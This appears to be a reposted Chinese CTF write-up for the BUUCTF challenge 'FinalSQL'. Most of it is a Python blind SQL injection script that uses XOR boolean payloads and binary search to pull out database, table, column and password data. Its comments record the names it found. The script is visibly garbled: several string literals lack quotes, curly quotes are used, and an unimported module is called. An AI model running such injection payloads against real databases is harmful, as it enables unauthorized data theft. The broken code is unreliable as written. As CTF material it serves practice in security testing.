[极客大挑战 2019]FinalSQL

Posted 夜幕下的灯火阑珊

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[极客大挑战 2019]FinalSQL相关的知识,希望对你有一定的参考价值。

知识点

  • 盲注

题目URL

http://953804e7-748b-4851-a646-78e820e28651.node3.buuoj.cn/search.php?id=1

 

 

由 1^2=3,令id=1^2成功得到id=3的页面

 


脚本

# -*- coding: utf-8 -*-
import requests
url = http://953804e7-748b-4851-a646-78e820e28651.node3.buuoj.cn/search.php?id=1
res = ‘‘
for i in range(1,500):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:        
        #payload = "^(ascii(substr(database(),{},1))>{})".format(i,mid)
        #payload = "^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=‘geek‘),{},1))>{})".format(i,mid)
        #payload = "^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)=‘Flaaaaag‘),{},1))>{})".format(i,mid)
        payload = "^(ascii(substr((select(group_concat(password))from(F1naI1y)),{},1))>{})".format(i,mid)
        r = requests.get(url=url+payload)        
        #print(mid)
        if r.status_code == 429:
            print(too fast)
            time.sleep(1)
        if NO! Not this! Click others~~~ not in r.text:
            left = mid + 1
        elif NO! Not this! Click others~~~ in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    if mid == 127 or mid == 31:
        break
    res += chr(mid)
    print(str(mid),res)
#库 geek
#表 F1naI1y,Flaaaaag
#列 id,username,password  id,fl4gawsl

 

技术图片

以上是关于[极客大挑战 2019]FinalSQL的主要内容,如果未能解决你的问题,请参考以下文章

[极客大挑战 2019]FinalSQL

[极客大挑战 2019]FinalSQL

[极客大挑战 2019]FinalSQL

[极客大挑战 2019]FinalSQL

第五十八题——[极客大挑战 2019]FinalSQL

BUUCTF-web